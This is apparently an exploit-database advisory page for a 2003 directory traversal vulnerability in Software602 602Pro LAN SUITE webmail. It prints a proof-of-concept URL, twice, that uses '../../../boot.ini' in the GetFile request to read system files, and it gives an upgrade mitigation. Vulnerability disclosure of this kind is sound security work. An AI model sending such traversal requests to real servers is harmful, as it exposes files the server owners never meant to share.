header-logo
Suggest Exploit
vendor:
602Pro LAN SUITE 2003
by:
SecurityFocus
8.3
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: 602Pro LAN SUITE 2003
Affected Version From: 602Pro LAN SUITE 2003
Affected Version To: 602Pro LAN SUITE 2003
Patch Exists: YES
Related CWE: N/A
CPE: a:software602:602pro_lan_suite_2003
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2003

A problem with the handling of directory traversal requests has been identified in Software602 602Pro LAN SUITE 2003

A directory traversal vulnerability exists in Software602 602Pro LAN SUITE 2003, which allows an attacker to gain access to potentially sensitive information. This is done by sending a specially crafted HTTP request to the webmail server, such as http://www.example.com/mail/m602cl3w.exe?A=GetFile&USER=7921604D7A587937986E24242C0588&DL=0&FN=../../../boot.ini, where USER signifies the current webmail user's username.

Mitigation:

Upgrade to the latest version of Software602 602Pro LAN SUITE 2003.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8701/info

A problem with the handling of directory traversal requests has been identified in Software602 602Pro LAN SUITE 2003. Because of this, an attacker may be able to gain access to potentially sensitive information. 

http://www.example.com/mail/m602cl3w.exe?A=GetFile&USER=7921604D7A587937986E24242C0588&DL=0&FN=../../../boot.ini

where USER signifies the current webmail user's username.

Navigation

Suggest Exploit

Services By CQR